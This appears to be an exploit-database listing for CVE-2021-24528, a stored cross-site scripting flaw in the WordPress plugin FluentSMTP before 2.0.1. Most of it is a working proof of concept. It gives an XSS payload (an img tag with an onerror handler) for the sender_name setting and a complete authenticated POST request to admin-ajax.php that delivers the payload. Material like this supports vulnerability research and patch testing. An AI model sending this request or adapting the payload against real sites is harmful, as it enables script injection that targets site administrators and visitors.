Exploit for FluentSMTP < 2.0.1 - Authenticated Stored XSS CVE-2021-24528

Name: Exploit for FluentSMTP < 2.0.1 - Authenticated Stored XSS CVE-2021-24528
Rating: 5 (403 reviews)

2021-07-29 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:8B8D316B-96B2-4CDC-9DA5-C9EA6108A85B
PoC
------------------------------
connection[sender_name]=<s>here</s><img src=1 onerror=alert(/XSS/)>
------------------------------


Full Request PoC
------------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example.com:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://target.example.com:8000/wp-admin/options-general.php?page=fluent-mail
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 377
Origin: http://target.example.com:8000
DNT: 1
Connection: close
Cookie: [admin cookies]

connection%5Bsender_name%5D=%3Cs%3Ehere%3C%2Fs%3E%3Cimg+src%3D1+onerror%3Dalert(%2FXSS%2F)%3E&connection%5Bsender_email%5D=test%40example.com&connection%5Bforce_from_name%5D=no&connection%5Bforce_from_email%5D=yes&connection%5Breturn_path%5D=yes&connection%5Bkey_store%5D=db&connection%5Bprovider%5D=default&connection_key=false&action=fluentmail-post-settings&nonce=64447f740d
------------------------------